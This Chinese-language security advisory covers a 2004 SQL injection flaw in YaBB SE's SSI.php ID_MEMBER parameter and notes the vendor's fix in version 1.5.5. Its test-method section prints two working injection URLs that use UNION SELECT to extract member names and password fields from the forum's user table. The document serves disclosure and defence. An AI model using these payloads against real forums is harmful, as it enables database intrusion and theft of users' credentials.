安全研究
安全漏洞
YABB SE SSI.php ID_MEMBER参数SQL注入漏洞
发布日期:2004-01-19
更新日期:2004-02-02
受影响系统:YaBB YaBB SE 1.5.4
YaBB YaBB SE 1.5.3
不受影响系统:YaBB YaBB SE 1.5.5
描述:
BUGTRAQ ID:
9449
Yabb Se是一款基于PHP/MySQL的论坛程序。
Yabb Se包含的SSI.php没有充分过滤用户提交的URI参数,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感信息或修改数据库。
SSI.php文件返回一些论坛最近论题,版面统计等一些信息,由于对ID_MEMBER参数缺少充分的过滤,攻击者可以提交恶意SQL命令,更改原有数据库逻辑,获得敏感信息或修改数据库。
<*来源:backspace (
backspace_2k@terra.es)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=107454067626384&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
backspace (
backspace_2k@terra.es)提供了如下测试方法:
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=2)+WHERE+m.ID_MSG+IN+(2,1)+AND+t.ID_TOPIC=m.ID_TOPIC+AND+b.ID_BOARD=t.ID_BOARD+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
或
http://vulnhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*建议:
厂商补丁:
YaBB
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到YABB SE 1.5.5:
http://www.yabbse.org/community/index.php?thread=27122浏览次数:4102
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |